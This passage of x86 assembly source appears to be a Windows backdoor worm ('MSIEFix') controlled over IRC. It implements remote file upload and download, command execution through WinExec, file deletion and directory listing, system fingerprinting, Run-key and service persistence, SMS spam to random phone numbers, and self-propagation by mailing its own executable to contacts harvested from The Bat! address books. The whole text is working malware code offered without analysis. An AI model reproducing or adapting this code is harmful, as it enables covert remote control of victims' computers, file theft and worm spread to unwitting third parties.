push 0 push dword ptr [DCC_socket] call accept xchg eax, dword ptr [DCC_socket] push eax call closesocket mov esi, 1000 sub esp, esi mov ebx, esp dcc_send_thread_loop: lea edi, [bytes_2_send] push 0 push edi push esi push ebx push dword ptr [file_handle] call ReadFile push 0 push dword ptr [bytes_2_send] push ebx push dword ptr [DCC_socket] call send inc eax jz dcc_send_thread_end_close_socket cmp dword ptr [edi], esi jz dcc_send_thread_loop add esp, esi mov eax, 1000 call online_sleep dcc_send_thread_end_close_socket: push dword ptr [DCC_socket] call closesocket dcc_send_thread_end_close_file: push dword ptr [file_handle] call CloseHandle dcc_send_thread_end: push dword ptr [file_name] call heap_free leave push 0 call ExitThread dcc_send_thread endp Convert_Digz db '0123456789ABCDEF' convert_num: push edi push ecx push edx push ebp sub esp, 12 mov ebp, esp cld mov esi, edi push esi xor ebx, ebx mov dword ptr [ebp], eax mov dword ptr [ebp+4], edx mov dword ptr [ebp+8], ebx mov esi, ebx _convert_num: inc esi mov eax, dword ptr [ebp+4] xor edx, edx div ecx mov dword ptr [ebp+4], eax mov eax, dword ptr [ebp] div ecx mov dword ptr [ebp], eax mov bl, dl mov al, byte ptr [Convert_Digz+ebx] stosb inc dword ptr [ebp+8] cmp dword ptr [ebp], 0 jnz _convert_num cmp dword ptr [ebp+4], 0 jnz _convert_num pop ecx push esi xchg ecx, esi shr ecx, 1 jz convert_num__ xchg edi, esi sub esi, 1 convert_num_: mov al, byte ptr [edi] xchg al, byte ptr [esi] stosb dec esi loop convert_num_ convert_num__: pop ebx add esp, 12 pop ebp pop edx pop ecx pop edi retn ascii_to_num: push ecx xor eax, eax mov ecx, eax ascii_to_num_loop: lodsb xor eax, '0' cmp eax, 10 jnc ascii_to_num_end imul ecx, ecx, 10 add ecx, eax jmp ascii_to_num_loop ascii_to_num_end: xchg eax, ecx pop ecx retn error_fc: add esp, 12 jmp connect_to_server_ dcc_rcv_command: call go_over_gapz jc dcc_recv_command_error push 1 pop eax call is_user_allowed jc send_command_error mov eax, edi push edi call file_name_only pop edi call go_until_gap jc dcc_recv_command_error push eax push dword ptr [edi] and byte ptr [edi], 0 xor ecx, ecx push ecx push ecx push CREATE_NEW push ecx push ecx push GENERIC_WRITE push eax call CreateFileA inc eax pop dword ptr [edi] pop edi jz dcc_recv_command_error dec eax push eax call CloseHandle mov eax, 200 call heap_alloc xchg eax, esi push edi push esi call lstrcpy @pushvar
push 0 push esi push offset dcc_recv_thread push 8192 push 0 call CreateThread xchg eax, ecx jecxz dcc_recv_command_error push ecx call CloseHandle clc retn dcc_recv_command_error: stc retn file_name_only: cmp byte ptr [edi], 0 jnz $+3 retn inc edi cmp byte ptr [edi-1], '\' jz file_name_only_ cmp byte ptr [edi-1], '/' jz file_name_only_ jmp file_name_only file_name_only_: mov eax, edi jmp file_name_only dcc_recv_thread proc file_name:DWORD local file_handle:DWORD local bytez_sent:DWORD local DCC_socket:DWORD local DCC_sin:sockaddr_in push 0 push SOCK_STREAM push AF_INET call socket mov dword ptr [DCC_socket], eax mov dword ptr [DCC_sin.sin_family], AF_INET mov edi, dword ptr [file_name] call go_until_gap and byte ptr [edi], 0 inc edi xor eax, eax push eax push eax push OPEN_EXISTING push eax push eax push GENERIC_WRITE push dword ptr [file_name] call CreateFileA inc eax jz dcc_recv_thread_end_close_socket dec eax mov dword ptr [file_handle], eax mov esi, edi call ascii_to_num call go_until_gap jc dcc_recv_thread_end inc edi push eax call htonl mov dword ptr [DCC_sin.sin_addr], eax mov esi, edi call ascii_to_num call go_until_gap jc dcc_recv_thread_end inc edi push eax call htons mov word ptr [DCC_sin.sin_port], ax mov esi, edi call ascii_to_num call go_until_gap mov ebx, eax lea edi, [DCC_sin.sin_zero] xor eax, eax stosd stosd lea eax, [DCC_sin] push type(sockaddr_in) push eax push dword ptr [DCC_socket] call connect inc eax jz dcc_recv_thread_end_close_socket sub esp, 1000 mov edi, esp xor esi, esi dcc_recv_thread_loop: push 0 push 1000 push edi push dword ptr [DCC_socket] call recv inc eax jz dcc_recv_thread_end_close_socket dec eax sub ebx, eax add esi, eax push 0 @pushvar
push eax push edi push dword ptr [file_handle] call WriteFile push esi call htonl lea edx, [bytez_sent] mov dword ptr [edx], eax push 0 push 4 push edx push dword ptr [DCC_socket] call send test ebx, ebx jnz dcc_recv_thread_loop add esp, 1000 dcc_recv_thread_end_close_socket: push dword ptr [DCC_socket] call closesocket dcc_recv_thread_end_close_file: push dword ptr [file_handle] call CloseHandle dcc_recv_thread_end: push dword ptr [file_name] call heap_free leave push 0 call ExitThread dcc_recv_thread endp execute_command: push 1 pop eax call is_user_allowed jc execute_command_end call go_over_gapz jc execute_command_end push 0 push edi call WinExec cmp eax, 31 execute_command_end: retn version_command: call message_for_who mov dword ptr [recipient], eax lea esi, [version_message] call send_message add esp, 4 retn info_command: xor eax, eax call is_user_allowed jc info_command_error call message_for_who mov dword ptr [recipient], eax push dword ptr [local_host_ip] call ntohl push eax call inet_ntoa mov dword ptr [privmsg_what], eax lea esi, [privmsg_msg] call send_message @pushsz "Win9x" pop eax mov dword ptr [privmsg_what], eax call GetVersion test eax, 8000000h jz info_command_go_on @pushsz "WinNT" pop eax mov dword ptr [privmsg_what], eax info_command_go_on: lea esi, [privmsg_msg] call send_message mov eax, MAX_PATH+1 call heap_alloc xchg esi, eax mov dword ptr [computer_name_length], MAX_PATH+1 @pushvar push esi call GetComputerNameA xchg eax, ecx jecxz info_command_jmp_over_machine call GetLastError mov dword ptr [privmsg_what], esi push esi lea esi, [privmsg_msg] call send_message pop esi info_command_jmp_over_machine: push esi call heap_free add esp, 4 info_command_error: retn delete_command proc local wfd:WIN32_FIND_DATA push 1 pop eax call is_user_allowed jc delete_command_end_error call go_over_gapz jc delete_command_end_error lea eax, [wfd] push eax push edi call FindFirstFileA inc eax stc jz delete_command_end_error dec eax xchg eax, ebx delete_command_loop: lea eax, [wfd.WFD_szFileName] push eax call DeleteFileA xchg eax, ecx jecxz delete_command_end lea eax, [wfd] push eax push ebx call FindNextFileA xchg eax, ecx jecxz delete_command_end_ jmp delete_command_loop delete_command_end_: clc jmp delete_command_end+1 delete_command_end: stc lahf push ebx call FindClose sahf delete_command_end_error: leave retn delete_command endp leave_command: push 1 pop eax call is_user_allowed jc leave_command_end lea esi, [query_settingz] call delete_registry_ call get_fcz_address jc leave_command_win9x push SC_MANAGER_CONNECT or SC_MANAGER_CREATE_SERVICE push 0 push 0 call OpenSCManagerA xchg eax, ecx jecxz leave_command_end xchg ecx, esi push DELETE push offset service_name push esi call OpenServiceA xchg eax, ecx jecxz leave_command_end push ecx push ecx call DeleteService call CloseServiceHandle push dword ptr [SC_Manager] call CloseServiceHandle sub esp, 300 mov esi, esp push 300 push esi push 0 call GetModuleFileNameA push MOVEFILE_DELAY_UNTIL_REBOOT push 0 push esi call MoveFileExA add esp, 300 test eax, eax jz leave_command_end jmp reboot_command_ leave_command_end: stc retn leave_command_win9x: xor eax, eax @pushvar
@pushvar push eax push KEY_QUERY_VALUE or KEY_SET_VALUE push eax push eax push eax @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push HKEY_LOCAL_MACHINE call RegCreateKeyExA @pushsz "MSIEFix" mov ebx, dword ptr [key_handle_] push ebx call RegDeleteValueA push ebx call RegCloseKey sub esp, 200 mov esi, esp push 200 push esi @pushsz "%windir%\wininit.ini" call ExpandEnvironmentStringsA sub esp, 300 mov edi, esp push 300 push edi push 0 call GetModuleFileNameA push esi push edi @pushsz "NUL" @pushsz "rename" call WritePrivateProfileStringA add esp, 500 jmp reboot_command_ sms_thread proc local _sms_email_:_email_ @SEH_SetupFrame IFDEF worm call the_bat_spread ENDIF sms_thread_loop: cmp dword ptr [online_flag], 1 jnz sms_thread_end_loop lea edi, [sms_number] push 6 pop ebx call get_random mov eax, dword ptr [predvolby+eax*4] stosd mov ecx, 6 push 10 pop ebx sms_thread_numberz_loop: call get_random add al, '0' stosb loop sms_thread_numberz_loop lea esi, [_sms_email_] mov dword ptr [esi], offset sms_from mov dword ptr [esi.EM_RcptTo], offset sms_email and dword ptr [esi.EM_Subject], 0 push 4 pop ebx call get_random xchg esi, ebx mov esi, dword ptr [_smses_+eax*4] lea edi, [ebx.EM_FilezNum] xor eax, eax stosd stosd cmp dword ptr [online_flag], 1 jnz sms_thread_end_loop call sms_send mov eax, 10000 call online_sleep jc sms_thread_end_loop jmp sms_thread_loop sms_thread_end_loop: @SEH_RemoveFrame leave push 0 call ExitThread sms_thread endp ; in: esi - Base64 string ; edi - buffer ; out: eax - size of decoded string base64_decode: pushad xor ebp, ebp push edi base64_decode_main_loop: xor ebx, ebx push 4 pop ecx base64_decode_loop: cmp dword ptr [esi], 0a0d0a0dh jz base64_decode_end lodsb test al, al jz base64_decode_end cmp al, '=' jz base64_decode_end_ call base64_find_char jc base64_decode_loop shl ebx, 6 or ebx, eax loop base64_decode_loop mov eax, ebx shr ebx, 8 mov byte ptr [edi], bh xchg al, ah inc edi stosw jmp base64_decode_main_loop base64_decode_end_: push ecx shr ebx, 2 loop $-3 pop ecx sub ecx, 4 not ecx mov eax, ebx stosb shr eax, 8 loop $-4 base64_decode_end: pop eax sub edi, eax dec eax mov dword ptr [esp.Pushad_eax], edi popad retn base64_find_char: pushad lea edi, [base64_alphabet] mov ecx, 64 repnz scasb stc pushfd sub edi, offset base64_alphabet dec edi popfd mov dword ptr [esp.Pushad_eax], edi popad jnz $+3 clc retn base64_encode: pushad xor ebp, ebp push 3 pop ecx cdq div ecx xchg eax, ecx push edx mov ebx, offset base64_alphabet cdq base64_encode_loop: push ecx push 4 pop ecx call base64_encode_main pop ecx loop base64_encode_loop pop ecx jecxz base64_encode_end inc ecx cmp ecx, 2 push ecx jz base64_make_padding pop eax push 1 base64_make_padding: call base64_encode_main pop ecx base64_padding_loop: push '=' pop eax call base64_stosb loop base64_padding_loop base64_encode_end: mov dword ptr [esp.Pushad_ecx], ebp popad retn base64_encode_main: mov al, byte ptr [esi] shr al, 2 call base64_stosb_ mov ax, word ptr [esi] xchg al, ah shr ax, 4 call base64_stosb_ jz base_64_encode_main_end inc esi mov ax, word ptr [esi] xchg al, ah shr ax, 6 call base64_stosb_ jz base_64_encode_main_end inc esi lodsb call base64_stosb_ base_64_encode_main_end: retn base64_stosb_: and al, 111111b xlat call base64_stosb dec ecx retn base64_stosb: stosb inc ebp inc edx cmp edx, 75 jnz base64_stosb_go_on xor edx, edx mov eax, CR_LF inc ebp stosw inc ebp base64_stosb_go_on: retn ; in: esi - ptr to _email_ struc ; out: CFlag == 0 if ok ; Cflag == 1 if error send_mail proc local file_size:DWORD local heap_handle_:DWORD local msg_buffer:DWORD local thread:DWORD local temp_handle:DWORD local fsh:DWORD local bytes_read_:DWORD xor eax, eax push eax push eax push eax call HeapCreate test eax, eax stc jz send_mail_end_ mov dword ptr [heap_handle_], eax xor eax, eax mov ecx, dword ptr [esi.EM_FilezNum] mov edx, eax mov edi, eax jecxz send_mail_alloc_mem test ecx, ecx jns send_mail_file_loop push 1 pop ecx send_mail_file_loop: push edx push ecx xor eax, eax push eax push eax push OPEN_EXISTING push eax push eax push GENERIC_READ mov eax, dword ptr [esi.EM_Filez] push dword ptr [eax+edx*4] call CreateFileA pop ecx pop edx inc eax jz send_mail_end dec eax push edx push ecx push eax lea ecx, [fsh] push ecx push eax call GetFileSize xchg eax, ebx call CloseHandle pop ecx pop edx cmp dword ptr [fsh], 0 jnz send_mail_end add edi, ebx shr ebx, 1 add edi, ebx inc edx loop send_mail_file_loop xchg eax, edi send_mail_alloc_mem: add eax, 1000 push eax push HEAP_ZERO_MEMORY push dword ptr [heap_handle_] call HeapAlloc test eax, eax jz send_mail_end mov dword ptr [msg_buffer], eax mov edi, dword ptr [msg_buffer] add edi, 8 push esi call generate_mail pop esi jc send_mail_end sub esp, 300 mov edi, esp mov esi, dword ptr [esi.EM_RcptTo] call generate_smtp_servers jc send_mail_end_add_esp mov eax, dword ptr [msg_buffer] mov dword ptr [eax], edi cmp dword ptr [online_flag], 1 jnz send_mail_end_add_esp @pushvar
push 0 push dword ptr [msg_buffer] push offset smtp_thread push 8192 push 0 call CreateThread mov dword ptr [thread], eax push 50 call Sleep push 60000 smtp_timeout equ $-4 push dword ptr [thread] call WaitForSingleObject inc eax jz send_mail_end_add_esp cmp eax, WAIT_TIMEOUT jnz send_mail_all_iz_maybe_ok push 0 mov ebx, dword ptr [thread] push ebx call TerminateThread push ebx call CloseHandle jmp send_mail_end_add_esp send_mail_all_iz_maybe_ok: sub esp, 4 push esp push dword ptr [thread] call GetExitCodeThread cmp dword ptr [esp], -1 lahf add esp, 4 sahf jz send_mail_end_add_esp add esp, 300 push dword ptr [thread] call CloseHandle clc jmp send_mail_end+1 send_mail_end_add_esp: add esp, 300 send_mail_end: stc pushfd push dword ptr [heap_handle_] call HeapDestroy popfd send_mail_end_: leave retn ; in: esi - email address ; edi - buffer to put there 3 strings (, smtp., mail.) generate_smtp_servers: pushad generate_smtp_servers_: lodsb test al, al jz generate_smtp_servers_error cmp al, '@' jnz generate_smtp_servers_ and byte ptr [edi], 0 push esi push edi call lstrcatA @endsz_ @copy stosb dec edi push esi push edi call lstrcatA @endsz_ @copy stosb dec edi push esi push edi call lstrcatA @endsz_ xor eax, eax dec eax stosd clc jmp generate_smtp_servers_error+1 generate_smtp_servers_error: stc popad retn ; this generates an email generate_mail: @SEH_SetupFrame @copy push 100 push edi call gethostname @endsz_ dec edi mov ax, CR_LF stosw inc edi @copy mov al, '<' stosb @copy mov al, '>' stosb mov ax, CR_LF stosw inc edi @copy mov al, '<' stosb @copy mov al, '>' stosb mov ax, CR_LF stosw inc edi @copy inc edi mov eax, dword ptr [esi.EM_FilezNum] test eax, eax jns generate_normal_mail_data xor eax, eax push eax push eax push OPEN_EXISTING push eax push eax push GENERIC_READ mov eax, dword ptr [esi.EM_Filez] push dword ptr [eax] call CreateFileA inc eax jz generate_mail_end dec eax xchg eax, ebx sub esp, 4 mov esi, esp @pushvar
push ebx call GetFileSize push 0 push esi push eax push edi push ebx call ReadFile add edi, dword ptr [esi] add esp, 4 push ebx call CloseHandle jmp generate_mail_jmp_over_data generate_normal_mail_data: call generate_mail_data jc generate_mail_end generate_mail_jmp_over_data: @copy inc edi @copy clc jmp generate_mail_end+1 generate_mail_end: stc lahf @SEH_RemoveFrame sahf retn generate_mail_data: @copy @copy xor eax, eax push 100 push edi push offset date_format push eax push eax push eax call GetDateFormatA @endsz_ dec edi mov ax, CR_LF stosw @copy @copy mov ax, CR_LF stosw @copy @copy mov ax, CR_LF stosw cmp dword ptr [esi.EM_Subject], 0 jz no_subject_in_mail @copy @copy mov ax, CR_LF stosw no_subject_in_mail: @copy mov ecx, dword ptr [esi.EM_Message] jecxz generate_mail_data_check_filez @copy @copy ecx mov ax, CR_LF stosw generate_mail_data_check_filez: mov ecx, dword ptr [esi.EM_FilezNum] test ecx, ecx jz generate_mail_data_end xor edx, edx generate_mail_data_attachmentz_loop: push edx push ecx push edx push esi @copy push edi mov eax, dword ptr [esi.EM_Filez] mov edi, dword ptr [eax+edx*4] mov eax, edi call file_name_only mov edi, eax pop esi xchg esi, edi mov edx, esi @copysz pop esi dec edi @copy push esi mov esi, edx @copysz pop esi dec edi mov al, '"' stosb mov ax, CR_LF stosw stosw pop edx xor eax, eax push eax push eax push OPEN_EXISTING push eax push eax push GENERIC_READ mov eax, dword ptr [esi.EM_Filez] push dword ptr [eax+edx*4] call CreateFileA mov dword ptr [temp_handle], eax @pushvar
push eax call GetFileSize xor edx, edx push 3 pop ecx div ecx xchg edx, ecx jecxz dont_align inc eax imul eax, eax, 3 dont_align: push eax push eax push HEAP_ZERO_MEMORY push dword ptr [heap_handle] call HeapAlloc test eax, eax jz generate_mail_data_close_file xchg eax, ebx pop eax lea ecx, [bytes_read_] push 0 push ecx push eax push ebx push dword ptr [temp_handle] call ReadFile push esi mov eax, dword ptr [bytes_read_] mov esi, ebx call base64_encode add edi, ecx pop esi push edi push ebx call heap_free pop edi push dword ptr [temp_handle] call CloseHandle pop ecx pop edx inc edx dec ecx jnz generate_mail_data_attachmentz_loop mov ax, CR_LF stosw generate_mail_data_end: @copy clc jmp generate_mail_data_end_error+1 generate_mail_data_close_file: push dword ptr [temp_handle] call CloseHandle generate_mail_data_end_error: stc retn send_mail endp smtp_thread proc msg_buffer:DWORD IFDEF log local file_handle:DWORD ENDIF local socket_handle_:DWORD local _sin__:sockaddr_in local response:DWORD local response_:DWORD local current_smtp_server:DWORD mov eax, dword ptr [msg_buffer] mov eax, dword ptr [eax] mov dword ptr [current_smtp_server], eax ; some init ... IFDEF log xor eax, eax push eax push eax push CREATE_ALWAYS push eax push eax push GENERIC_WRITE @pushsz "smtp.log" call CreateFileA inc eax jz smtp_thread_end mov dword ptr [file_handle], eax ENDIF push 0 push SOCK_STREAM push AF_INET call socket inc eax jz smtp_thread_end_close_file dec eax mov dword ptr [socket_handle_], eax smtp_server_loop: mov esi, dword ptr [current_smtp_server] call get_hostent jz smtp_thread_next_smtp_server lea edi, [_sin__] push SMTP_PORT pop ebx call update_sin push type(sockaddr_in) push edi push dword ptr [socket_handle_] call connect test eax, eax jnz smtp_thread_next_smtp_server call get_response jc smtp_thread_next_smtp_server cmp eax, '022' jnz smtp_thread_next_smtp_server mov esi, dword ptr [msg_buffer] add esi, 8 mov edi, esi @endsz sub esi, edi dec esi call write_socket jz smtp_thread_next_smtp_server call get_response jc smtp_thread_next_smtp_server cmp eax, '052' jnz smtp_thread_next_smtp_server xchg esi, edi add esi, edi inc esi mov ecx, 5 smtp_thread_main_loop: mov edi, esi @endsz sub esi, edi push ecx dec esi call write_socket jz smtp_thread_next_smtp_server call get_response jc smtp_thread_next_smtp_server cmp eax, '052' jz smtp_thread_main_loop_go_on cmp eax, '152' jz smtp_thread_main_loop_go_on cmp eax, '453' jz smtp_thread_main_loop_go_on cmp eax, '122' jz smtp_thread_main_loop_go_on pop eax jmp smtp_thread_next_smtp_server smtp_thread_main_loop_go_on: pop ecx xchg esi, edi add esi, edi inc esi loop smtp_thread_main_loop push dword ptr [socket_handle_] call closesocket IFDEF log push dword ptr [file_handle] call CloseHandle ENDIF leave push 0 call ExitThread smtp_thread_next_smtp_server: mov esi, dword ptr [current_smtp_server] @endsz mov eax, dword ptr [esi] inc eax jnz smtp_thread_no_error push dword ptr [socket_handle_] call closesocket smtp_thread_end_close_file: IFDEF log push dword ptr [file_handle] call CloseHandle ENDIF smtp_thread_end: leave push -1 call ExitThread smtp_thread_no_error: mov dword ptr [current_smtp_server], esi jmp smtp_server_loop smtp_thread endp write_socket: IFDEF log pushad push 0 @pushvar
push esi push edi push dword ptr [file_handle] call WriteFile popad ENDIF push 0 push esi push edi push dword ptr [socket_handle_] call send inc eax retn get_response: push 0 push 4 lea eax, [response] push eax push dword ptr [socket_handle_] call recv cmp eax, 4 jnz get_response_end_error get_response_loop: push 0 push 1 lea eax, [response_] push eax push dword ptr [socket_handle_] call recv cmp eax, 1 jnz get_response_end_error cmp byte ptr [response_], 0ah jnz get_response_loop clc jmp get_response_end_error+1 get_response_end_error: stc mov eax, dword ptr [response] pushfd and eax, 0ffffffh popfd retn ; in: esi - string to make CRC32 ; [esp+4] - length of string or null if ASCIIZ_string ; out: eax - CRC32 gimme_CRC32: pushad xor edx, edx mov eax, edx gimme_CRC32_all_iz_ok: mov ecx, dword ptr [esp.cPushad+4] jecxz gimme_CRC32_asciiz_string gimme_CRC32_main_loop: lodsb cmp al, 'a' jc gimme_CRC32_big cmp al, 'z' ja gimme_CRC32_big add al, 'A'-'a' gimme_CRC32_big: xor ah, al rol eax, 8 xor eax, edx not edx mov bl, 32 gimme_CRC32_next: rol eax, 1 xor edx, 05f6abcd8h xor eax, 0a6dfe9ffh ror edx, 1 add eax, edx xor edx, 08ad6fe7h dec bl jnz gimme_CRC32_next xor eax, edx dec ecx jnz gimme_CRC32_main_loop mov dword ptr [esp.Pushad_eax], eax popad retn 4 gimme_CRC32_asciiz_string: mov edi, esi push esi inc edi @endsz sub esi, edi mov dword ptr [esp.cPushad+8], esi pop esi jmp gimme_CRC32_all_iz_ok email_msg proc local e_mail_:_email_ xor eax, eax call is_user_allowed jc email_msg_end lea esi, [e_mail_] call parse_message_ jc email_msg_end mov dword ptr [esi.EM_RcptTo], eax call parse_message_ jc email_msg_end mov dword ptr [esi], eax call parse_message_ jc email_msg_end push esi mov esi, eax call ascii_to_num xchg eax, ebx pop esi call parse_string_ jc email_msg_end cmp word ptr [eax], 2dh jnz $+4 xor eax, eax mov dword ptr [esi.EM_Subject], eax call parse_string_ jc email_msg_end mov dword ptr [esi.EM_Message], eax lea edi, [esi.EM_FilezNum] xor eax, eax stosd stosd xchg ebx, ecx email_msg_loop: push ecx call send_mail pop ecx jc email_msg_end loop email_msg_loop email_msg_end: leave retn email_msg endp email_redir proc local e_mail_:_email_ push 1 pop eax call is_user_allowed jc email_redir_end lea esi, [e_mail_] call parse_message_ jc email_redir_end mov dword ptr [esi.EM_RcptTo], eax call parse_message_ jc email_redir_end mov dword ptr [esi], eax call parse_message_ jc email_redir_end push esi mov esi, eax call ascii_to_num xchg eax, ebx pop esi call parse_message_ sub esp, 4 mov dword ptr [esi.EM_Filez], esp mov dword ptr [esp], eax push -1 pop eax mov dword ptr [esi.EM_FilezNum], eax xchg ebx, ecx email_redir_loop: push ecx call send_mail pop ecx jc email_redir_go_on loop email_redir_loop email_redir_go_on: lahf add esp, 4 sahf email_redir_end: leave retn email_redir endp email_file proc local e_mail_:_email_ xor eax, eax call is_user_allowed jc email_file_end lea esi, [e_mail_] call parse_message_ jc email_file_end mov dword ptr [esi.EM_RcptTo], eax call parse_message_ jc email_file_end mov dword ptr [esi], eax call parse_string_ jc email_file_end cmp word ptr [eax], 2dh jnz $+4 xor eax, eax mov dword ptr [esi.EM_Subject], eax call parse_string_ jc email_file_end mov dword ptr [esi.EM_Message], eax call parse_message_ sub esp, 4 mov dword ptr [esi.EM_Filez], esp mov dword ptr [esp], eax push 1 pop eax mov dword ptr [esi.EM_FilezNum], eax call send_mail lahf add esp, 4 sahf email_file_end: leave retn email_file endp send_sms proc local _sms_email_:_email_ xor eax, eax call is_user_allowed jc send_sms_end lea esi, [_sms_email_] call parse_message_ jc send_sms_end mov dword ptr [esi.EM_RcptTo], eax call parse_message_ jc send_sms_end mov dword ptr [esi], eax call parse_message_ jc email_redir_end push esi mov esi, eax call ascii_to_num xchg eax, ebx pop esi call parse_string_ jc send_sms_end cmp word ptr [eax], 2dh jnz $+4 xor eax, eax mov dword ptr [esi.EM_Subject], eax call parse_string_ jc send_sms_end xchg ebx, ecx xchg esi, ebx xchg eax, esi lea edi, [ebx.EM_FilezNum] xor eax, eax stosd stosd send_sms_loop: pushad call sms_send popad jc send_sms_end loop send_sms_loop send_sms_end: leave retn send_sms endp email_spread proc local e_mail_:_email_ push 1 pop eax call is_user_allowed jc email_spread_end push edi lea edi, [e_mail_] lea esi, [msiefix_email] push edi push type (_email_)/4 pop ecx rep movsd pop esi pop edi call parse_message_ mov dword ptr [esi.EM_RcptTo], eax call spread_msiefix email_spread_end: leave retn email_spread endp spread_msiefix: sub esp, 300 mov edi, esp push 300 push edi push 0 call GetModuleFileNameA sub esp, 4 mov dword ptr [esi.EM_Filez], esp mov dword ptr [esp], edi push 1 pop eax mov dword ptr [esi.EM_FilezNum], eax call send_mail lahf add esp, 304 sahf retn parse_message_: call go_over_gapz jc parse_message_end_ mov eax, edi call go_until_gap jc parse_message_end_ and byte ptr [edi], 0 inc edi clc parse_message_end_: retn parse_string_: call go_over_gapz jc parse_string_end_ cmp byte ptr [edi], '"' jnz parse_string_end_ inc edi mov eax, edi parse_string_find: cmp byte ptr [edi], '"' jz parse_string_found cmp byte ptr [edi], 0 jz parse_string_end_ inc edi jmp parse_string_find parse_string_found: and byte ptr [edi], 0 inc edi clc jmp parse_string_end_+1 parse_string_end_: stc retn IFDEF _send_notice_ send_notice: call get_local_host push dword ptr [local_host_ip] call ntohl push eax call inet_ntoa lea edi, [notice_ip] @copy eax lea esi, [notice_email] call send_mail retn ENDIF the_bat_spread proc local ftime:FILETIME local subkey_index:DWORD push offset stime call GetLocalTime cmp word ptr [stime.ST_Day], 03h jnz the_bat_spread_end xor eax, eax @pushvar
@pushvar push eax push KEY_QUERY_VALUE or KEY_ENUMERATE_SUB_KEYS push eax push eax push eax @pushsz "" push HKEY_USERS call RegCreateKeyExA xchg eax, ecx jecxz $+3 retn sub esp, 1000 mov edi, esp mov dword ptr [subkey_index], ecx enum_subkeys_loop: mov dword ptr [lpcsubkey], 750 lea eax, [ftime] push eax push ecx push ecx push ecx @pushvar push edi push dword ptr [subkey_index] push dword ptr [key_handle__] call RegEnumKeyExA xchg eax, ecx jecxz enum_subkeys_all_ok cmp ecx, ERROR_NO_MORE_ITEMS jz enum_subkeys_end enum_subkeys_all_ok: push ecx call try_this_subkey pop ecx jnc enum_subkeys_end inc dword ptr [subkey_index] jmp enum_subkeys_loop enum_subkeys_end: add esp, 1000 push dword ptr [key_handle__] call RegCloseKey the_bat_spread_end: leave retn the_bat_spread endp try_this_subkey: @pushsz "\Software\RIT\The Bat!" push edi call lstrcatA xor eax, eax @pushvar
@pushvar push eax push KEY_QUERY_VALUE push eax push eax push eax push edi push HKEY_USERS call RegCreateKeyExA xchg eax, ecx jecxz $+4 stc retn sub esp, 500 mov esi, esp mov dword ptr [lpcbdata], 400 @pushvar push esi @pushvar push 0 @pushsz "Working Directory" push dword ptr [key_handle___] call RegQueryValueExA test eax, eax stc jnz try_this_subkey_end push edi call try_this_directory pop edi try_this_subkey_end: lahf add esp, 500 push eax push dword ptr [key_handle___] call RegCloseKey pop eax sahf retn ; in: esi - working directory try_this_directory: push ebp pushad @copysz popad sub esp, 300 mov ebx, esp sub esp, 300 mov ebp, esp @pushsz "addrbook.ini" push edi call lstrcatA push edi push 300 push ebx @pushsz "-" @pushsz "Address Books" @pushsz "Profile" call GetPrivateProfileStringA cmp byte ptr [ebx], "-" jz try_this_directory_end push esi mov esi, ebx call ascii_to_num pop esi xchg eax, ecx test ecx, ecx jz try_this_directory_end push 1 pop eax address_book_loop: pushad mov edi, ebp @copy esi stosb popad push ecx push eax push edi push ebx push esi mov edi, offset address_book_ xor edx, edx push 10 pop ecx call convert_num add edi, ebx xor eax, eax stosb pop esi pop ebx pop edi push edi push 300 push ebx @pushsz "-" push offset address_book @pushsz "Profile" call GetPrivateProfileStringA pop eax pop ecx cmp byte ptr [ebx], "-" jz try_this_directory_end push ecx push eax push ebx push edi mov edi, ebx mov eax, ebx mov ecx, ebx call file_name_only mov ebx, eax pop edi cmp ecx, eax jz address_book_next mov ebx, ecx and byte ptr [ebp], 0 address_book_next: push ebx push ebp call lstrcatA call try_this_file pop ebx pop eax pop ecx inc eax dec ecx jnz address_book_loop clc jmp try_this_directory_end+1 try_this_directory_end: stc lahf add esp, 600 sahf pop ebp retn ; in: ebp - address book file try_this_file: pushad xor eax, eax push eax push eax push OPEN_EXISTING push eax push eax push GENERIC_READ or GENERIC_WRITE push ebp call CreateFileA inc eax jz try_this_file_end mov dword ptr [addr_book_file], eax push 0 push eax call GetFileSize mov dword ptr [file_size_], eax xor ecx, ecx push ecx push eax push ecx push PAGE_READWRITE push ecx push dword ptr [addr_book_file] call CreateFileMappingA xchg eax, ecx test ecx, ecx jz try_this_file_end_close_file mov dword ptr [hmap], ecx xor eax, eax push eax push eax push eax push FILE_MAP_READ or FILE_MAP_WRITE push ecx call MapViewOfFile xchg eax, ecx jecxz try_this_file_end_close_mapping xchg ecx, edi mov ecx, 12345678h file_size_ equ $-4 mov dword ptr [mapping_base], edi mov eax, 0ffa60a0dh try_this_file_main_loop: repnz scasb jecxz try_this_file_end_unmap cmp dword ptr [edi-1], eax jnz try_this_file_main_loop push edi dec edi push edi mov dword ptr [esp], edi email_address_loop: dec edi cmp byte ptr [edi], 20h jae try_it_next jmp email_address_loop_end try_it_next: cmp byte ptr [edi], 7fh jc email_address_loop email_address_loop_end: cmp word ptr [edi-1], CR_LF jnz email_address_loop_got_it dec edi jmp email_address_loop-3 email_address_loop_got_it: inc edi lea esi, [msiefix_email] mov dword ptr [esi.EM_RcptTo], edi pop edi push dword ptr [edi] and byte ptr [edi], 0 pushad call spread_msiefix popad pop dword ptr [edi] pop edi jmp try_this_file_main_loop try_this_file_end_unmap: push 12345678h mapping_base equ $-4 call UnmapViewOfFile try_this_file_end_close_mapping: push 12345678h hmap equ $-4 call CloseHandle try_this_file_end_close_file: push 12345678h addr_book_file equ $-4 call CloseHandle try_this_file_end: popad retn ls_command proc local wfd:WIN32_FIND_DATA xor eax, eax call is_user_allowed jc ls_command_end call message_for_who mov dword ptr [recipient], eax cmp dword ptr [to_flag], 0 jnz ls_command_end call go_over_gapz jc ls_command_end lea eax, [wfd] push eax push edi call FindFirstFileA inc eax jz ls_command_end dec eax xchg eax, ebx mov eax, 30000 call heap_alloc xchg eax, edi mov dword ptr [privmsg_what], edi ls_command_loop: lea esi, [wfd.WFD_szFileName] mov al, '\' test dword ptr [wfd.WFD_dwFileAttributes], FILE_ATTRIBUTE_DIRECTORY jz $+3 stosb @copysz inc edi mov dword ptr [edi-2], ' ;' lea eax, [wfd] push eax push ebx call FindNextFileA xchg eax, ecx jecxz ls_command_close jmp ls_command_loop ls_command_close: push ebx call FindClose mov edi, dword ptr [privmsg_what] mov esi, 400 call split_string mov ecx, edx push edi ls_command_print_loop: mov dword ptr [privmsg_what], edi pushad lea esi, [privmsg_msg] call send_message popad @endsz_ loop ls_command_print_loop call heap_free clc jmp ls_command_end+1 ls_command_end: stc leave retn ls_command endp reboot_command: push 1 pop eax call is_user_allowed jc reboot_command_end reboot_command_: push 0 push 